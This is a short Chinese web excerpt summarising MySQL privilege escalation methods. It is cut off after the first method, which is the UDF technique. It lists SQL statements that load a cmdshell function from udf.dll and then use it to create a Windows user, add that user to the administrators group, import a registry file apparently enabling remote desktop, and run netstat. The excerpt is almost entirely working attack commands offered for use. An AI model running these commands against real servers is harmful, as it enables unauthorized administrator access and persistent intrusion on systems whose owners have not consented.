-
mysql提权方法总结四则
一 UDF提权 这类提权方法我想大家已经知道了,我大致写一下,具体语句如下: create function cmdshell returns string soname ’udf.dll’ select cmdshell(’net user iis_user /add’); select cmdshell(’net localgroup administrators iis_user /add’); select cmdshell(’regedit /s d:\web\3389.reg’); drop function cmdshell; select cmdshell(’netstat -an’); 二 ...阅读全文阅读全文